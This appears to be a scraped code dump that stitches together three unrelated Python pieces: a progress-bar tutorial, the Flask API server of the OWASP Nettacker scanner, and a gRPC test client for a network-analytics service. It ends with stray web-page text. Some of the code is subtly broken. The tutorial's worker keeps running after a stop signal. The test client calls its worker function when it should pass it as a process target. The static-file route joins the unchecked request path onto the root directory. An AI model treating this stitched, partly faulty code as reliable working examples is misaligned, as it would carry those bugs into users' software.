When using the Progress Bar, you need to write two functions:
1) An outer function that takes an object like a numpy array, breaks it into blocks, and creates the ProgressBar object.
2) An inner function that receives the chunks, performs the processing, and returns the results.
If you are using a progress bar in a plugin, make sure to write it in its own python file, or the threads may crash.
The first function should look something like this:
'''
def outer_func():
# get original data and arguments that the inner function will receive
original_data=np.random.random((1000,200,200))
args=(1,)
#break data into blocks
nCores = cpu_count()
block_ends = np.linspace(0,len(original_data),nCores+1).astype(np.int)
data_blocks=[original_data[block_ends[i]:block_ends[i+1]] for i in np.arange(nCores)] # each thread will get one element of this list.
# create the ProgressBar object
progress = ProgressBar(inner_func, data_blocks, args, nCores, msg='Performing my cool inner function')
# Once the ProgressBar object finishes running, the results of all the
# inner function's computations will be stored in progress.results in a
# list. You will have to merge the list. If the user presses the Stop
# button, the progress.results will be set to None
if progress.results is None or any(r is None for r in progress.results):
result=None
else:
result=np.concatenate(progress.results,axis=0)
return result
'''
The inner function will actually do the heavy lifting.
Each process will be running the inner function. Each inner function must
take the same 5 arguments.
'''
def inner_func(q_results, q_progress, q_status, child_conn, args):
data=child_conn.recv() # unfortunately this step takes a long time
percent=0 # This is the variable we send back which displays our progress
status=q_status.get(True) #this blocks the process from running until all processes are launched
if status=='Stop':
q_results.put(None) # if the user presses stop, return None
# Here is the meat of the inner_func.
val,=args #unpack all the variables inside the args tuple
result=np.zeros(data.shape)
ii,jj,kk=data.shape
for i in np.arange(ii):
for j in np.arange(jj):
for k in np.arange(kk):
result[i,j,k]=data[i,j,k]+val
if not q_status.empty(): #check if the stop button has been pressed
stop=q_status.get(False)
q_results.put(None)
return
if percent<int(100*i/ii):
percent=int(100*i/ii)
q_progress.put(percent)
# finally, when we've finished with our calculation, we send back the result
q_results.put(result)
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
result=outer_func()
print(result)
|
engine.py | # !/usr/bin/env python
# -*- coding: utf-8 -*-
import multiprocessing
import time
import random
import os
import string
from flask import Flask
from flask import jsonify
from flask import request as flask_request
from flask import render_template
from flask import abort
from flask import Response
from flask import make_response
from core.alert import write_to_api_console
from core.alert import messages
from core._die import __die_success
from api.api_core import __structure
from api.api_core import __get_value
from api.api_core import root_dir
from api.api_core import get_file
from api.api_core import __mime_types
from api.api_core import __scan_methods
from api.api_core import __profiles
from api.api_core import __graphs
from api.api_core import __languages
from core.load_modules import load_all_method_args
from core.config import _core_config
from core.config_builder import _core_default_config
from core.config_builder import _builder
from api.api_core import __remove_non_api_keys
from api.api_core import __rules
from api.api_core import __api_key_check
from api.__database import __select_results
from api.__database import __get_result
from api.__database import __last_host_logs
from api.__database import __logs_to_report_json
from api.__database import __search_logs
from api.__database import __logs_to_report_html
from api.__start_scan import __scan
from core._time import now
template_dir = os.path.join(os.path.join(
os.path.dirname(os.path.dirname(__file__)), "web"), "static")
app = Flask(__name__, template_folder=template_dir)
app.config.from_object(__name__)
def __language(app=app):
"""
find the language in config
Args:
app: flask app
Returns:
the language in string
"""
return app.config["OWASP_NETTACKER_CONFIG"]["language"]
@app.errorhandler(400)
def error_400(error):
"""
handle the 400 HTTP error
Args:
error: the flask error
Returns:
400 JSON error
"""
return jsonify(__structure(status="error", msg=error.description)), 400
@app.errorhandler(401)
def error_401(error):
"""
handle the 401 HTTP error
Args:
error: the flask error
Returns:
401 JSON error
"""
return jsonify(__structure(status="error", msg=error.description)), 401
@app.errorhandler(403)
def error_403(error):
"""
handle the 403 HTTP error
Args:
error: the flask error
Returns:
403 JSON error
"""
return jsonify(__structure(status="error", msg=error.description)), 403
@app.errorhandler(404)
def error_404(error):
"""
handle the 404 HTTP error
Args:
error: the flask error
Returns:
404 JSON error
"""
return jsonify(__structure(status="error",
msg=messages(app.config["OWASP_NETTACKER_CONFIG"]["language"], "not_found"))), 404
@app.before_request
def limit_remote_addr():
"""
check if IP filtering applied and API address is in whitelist
Returns:
None if it's in whitelist otherwise abort(403)
"""
# IP Limitation
if app.config["OWASP_NETTACKER_CONFIG"]["api_client_white_list"]:
if flask_request.remote_addr not in app.config["OWASP_NETTACKER_CONFIG"]["api_client_white_list_ips"]:
abort(403, messages(__language(), "unauthorized_IP"))
return
@app.after_request
def access_log(response):
"""
if access log enabled, its writing the logs
Args:
response: the flask response
Returns:
the flask response
"""
if app.config["OWASP_NETTACKER_CONFIG"]["api_access_log"]:
r_log = open(app.config["OWASP_NETTACKER_CONFIG"][
"api_access_log_filename"], "ab")
# if you need to log POST data
# r_log.write(
# "{0} [{1}] {2} \"{3} {4}\" {5} {6} {7}\r\n".format(flask_request.remote_addr, now(), flask_request.host,
# flask_request.method, flask_request.full_path,
# flask_request.user_agent, response.status_code,
# json.dumps(flask_request.form)))
r_log.write("{0} [{1}] {2} \"{3} {4}\" {5} {6}\r\n".format(flask_request.remote_addr, now(), flask_request.host,
flask_request.method, flask_request.full_path,
flask_request.user_agent, response.status_code))
r_log.close()
return response
@app.route("/", defaults={"path": ""})
@app.route("/<path:path>")
def get_statics(path):
"""
getting static files and return content mime types
Args:
path: path and filename
Returns:
file content and content type if file found otherwise abort(404)
"""
static_types = __mime_types()
return Response(get_file(os.path.join(root_dir(), path)),
mimetype=static_types.get(os.path.splitext(path)[1], "text/html"))
@app.route("/", methods=["GET", "POST"])
def index():
"""
index page for WebUI
Returns:
rendered HTML page
"""
filename = _builder(_core_config(), _core_default_config())["log_in_file"]
return render_template("index.html", scan_method=__scan_methods(), profile=__profiles(),
graphs=__graphs(), languages=__languages(), filename=filename,
method_args_list=load_all_method_args(__language(), API=True))
@app.route("/new/scan", methods=["GET", "POST"])
def new_scan():
"""
new scan through the API
Returns:
a JSON message with scan details if success otherwise a JSON error
"""
_start_scan_config = {}
__api_key_check(app, flask_request, __language())
for key in _core_default_config():
if __get_value(flask_request, key) is not None:
_start_scan_config[key] = __get_value(flask_request, key)
_start_scan_config["backup_ports"] = __get_value(flask_request, "ports")
_start_scan_config = __rules(__remove_non_api_keys(_builder(_start_scan_config,
_builder(_core_config(), _core_default_config()))),
_core_default_config(), __language())
p = multiprocessing.Process(target=__scan, args=[_start_scan_config])
p.start()
# Sometimes method_args is too big!
_start_scan_config["methods_args"] = {
"as_user_set": "set_successfully"
}
return jsonify(_start_scan_config), 200
@app.route("/session/check", methods=["GET"])
def __session_check():
"""
check the session if it's valid
Returns:
a JSON message if it's valid otherwise abort(401)
"""
__api_key_check(app, flask_request, __language())
return jsonify(__structure(status="ok", msg=messages(__language(), "browser_session_valid"))), 200
@app.route("/session/set", methods=["GET"])
def __session_set():
"""
set session on the browser
Returns:
200 HTTP response if session is valid and a set-cookie in the response if success otherwise abort(403)
"""
__api_key_check(app, flask_request, __language())
res = make_response(
jsonify(__structure(status="ok", msg=messages(__language(), "browser_session_valid"))))
res.set_cookie("key", value=app.config[
"OWASP_NETTACKER_CONFIG"]["api_access_key"])
return res
@app.route("/session/kill", methods=["GET"])
def __session_kill():
"""
unset session on the browser
Returns:
a 200 HTTP response with set-cookie to "expired" to unset the cookie on the browser
"""
res = make_response(
jsonify(__structure(status="ok", msg=messages(__language(), "browser_session_killed"))))
res.set_cookie("key", value="expired")
return res
@app.route("/results/get_list", methods=["GET"])
def __get_results():
"""
get list of scan's results through the API
Returns:
an array of JSON scan's results if success otherwise abort(403)
"""
__api_key_check(app, flask_request, __language())
try:
page = int(__get_value(flask_request, "page"))
except:
page = 1
return jsonify(__select_results(__language(), page)), 200
@app.route("/results/get", methods=["GET"])
def __get_result_content():
"""
get a result HTML/TEXT/JSON content
Returns:
content of the scan result
"""
__api_key_check(app, flask_request, __language())
try:
id = int(__get_value(flask_request, "id"))
except:
return jsonify(__structure(status="error", msg="your scan id is not valid!")), 400
return __get_result(__language(), id)
@app.route("/logs/get_list", methods=["GET"])
def __get_last_host_logs():
"""
get list of logs through the API
Returns:
an array of JSON logs if success otherwise abort(403)
"""
__api_key_check(app, flask_request, __language())
try:
page = int(__get_value(flask_request, "page"))
except:
page = 1
return jsonify(__last_host_logs(__language(), page)), 200
@app.route("/logs/get_html", methods=["GET"])
def __get_logs_html():
"""
get host's logs through the API in HTML type
Returns:
HTML report
"""
__api_key_check(app, flask_request, __language())
try:
host = __get_value(flask_request, "host")
except:
host = ""
return make_response(__logs_to_report_html(host, __language()))
@app.route("/logs/get_json", methods=["GET"])
def __get_logs():
"""
get host's logs through the API in JSON type
Returns:
an array with JSON events
"""
__api_key_check(app, flask_request, __language())
try:
host = __get_value(flask_request, "host")
except:
host = ""
return jsonify(__logs_to_report_json(host, __language())), 200
@app.route("/logs/search", methods=["GET"])
def ___go_for_search_logs():
"""
search in all events
Returns:
an array with JSON events
"""
__api_key_check(app, flask_request, __language())
try:
page = int(__get_value(flask_request, "page"))
except:
page = 1
try:
query = __get_value(flask_request, "q")
except:
query = ""
return jsonify(__search_logs(__language(), page, query)), 200
def __process_it(api_host, api_port, api_debug_mode, api_access_key, api_client_white_list,
api_client_white_list_ips, api_access_log, api_access_log_filename, language):
"""
a function to run flask in a subprocess to make kill signal in a better way!
Args:
api_host: host/IP to bind address
api_port: bind port
api_debug_mode: debug mode flag
api_access_key: API access key
api_client_white_list: clients while list flag
api_client_white_list_ips: clients white list IPs
api_access_log: access log flag
api_access_log_filename: access log filename
language: language
"""
app.config["OWASP_NETTACKER_CONFIG"] = {
"api_access_key": api_access_key,
"api_client_white_list": api_client_white_list,
"api_client_white_list_ips": api_client_white_list_ips,
"api_access_log": api_access_log,
"api_access_log_filename": api_access_log_filename,
"language": language
}
app.run(host=api_host, port=api_port, debug=api_debug_mode, threaded=True)
def _start_api(api_host, api_port, api_debug_mode, api_access_key, api_client_white_list,
api_client_white_list_ips, api_access_log, api_access_log_filename, language):
"""
entry point to run the API through the flask
Args:
api_host: host/IP to bind address
api_port: bind port
api_debug_mode: debug mode
api_access_key: API access key
api_client_white_list: clients while list flag
api_client_white_list_ips: clients white list IPs
api_access_log: access log flag
api_access_log_filename: access log filename
language: language
"""
# Starting the API
write_to_api_console(messages(language, "API_key").format(api_access_key))
p = multiprocessing.Process(target=__process_it,
args=(api_host, api_port, api_debug_mode, api_access_key, api_client_white_list,
api_client_white_list_ips, api_access_log, api_access_log_filename, language))
p.start()
# Sometimes it's take much time to terminate flask with CTRL+C
# So It's better to use KeyboardInterrupt to terminate!
while 1:
try:
exitflag = True
if len(multiprocessing.active_children()) is not 0:
exitflag = False
time.sleep(0.3)
if exitflag:
break
except KeyboardInterrupt:
for process in multiprocessing.active_children():
process.terminate()
break
__die_success()
|
snet_test_client.py | # Tested on python3.6
import logging
import multiprocessing as mp
import grpc
import pem
import time
import datetime
from service_spec_node_importance import network_analytics_node_importance_pb2
from service_spec_node_importance import network_analytics_node_importance_pb2_grpc
import subprocess
import yaml
def multi_pro_sample():
output = mp.Queue()
processes = [mp.Process(target=f, args=[output]) for x in range(4)]
for p in processes:
p.start()
for p in processes:
p.join()
results = [output.get() for p in processes]
print(results)
def f(output):
print(3)
output.put(4)
def multi_pro(num_requests):
output = mp.Queue()
processes = [mp.Process(target=find_central_nodes(output), args=[output]) for x in range(num_requests)]
for p in processes:
p.start()
for p in processes:
p.join()
results = [output.get() for p in processes]
print(results)
summed = sum([t[0] for t in results])
print(summed , '/' , len(results))
def find_central_nodes(output):
try:
channel = grpc.insecure_channel('tz-services-1.snet.sh:2234')
# channel = grpc.insecure_channel('localhost:5001')
stub = network_analytics_node_importance_pb2_grpc.NetworkAnalyticsNodeImportanceStub(channel)
graph = {
"nodes": ['1', '2', '3', '4', '5', '6', '7', '8'],
"edges": [['1', '2'], ['1', '4'], ['2', '3'], ['2', '5'], ['3', '4'], ['3', '6'], ['2', '7'], ['3', '8']],
"weights": [3, 4, 5, 6, 7, 8, 9, 10]
}
edges_req = []
for e in graph["edges"]:
edges_req.append(network_analytics_node_importance_pb2.Edge(edge=e))
graph_in = network_analytics_node_importance_pb2.Graph(nodes=graph["nodes"], edges=edges_req)
center_req = network_analytics_node_importance_pb2.CentralNodeRequest(graph=graph_in)
resp = stub.CentralNodes(center_req)
output.put((1,resp.message))
except Exception as e:
output.put((0,str(e)))
if __name__ == '__main__':
start_time = time.time()
multi_pro(1)
# find_central_nodes()
end_time = time.time()
print('Testing took ' + str(((end_time - start_time) )) + ' seconds.')
print('Testing took ' + str(((end_time - start_time) / 60)) + ' minutes.')
pass
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.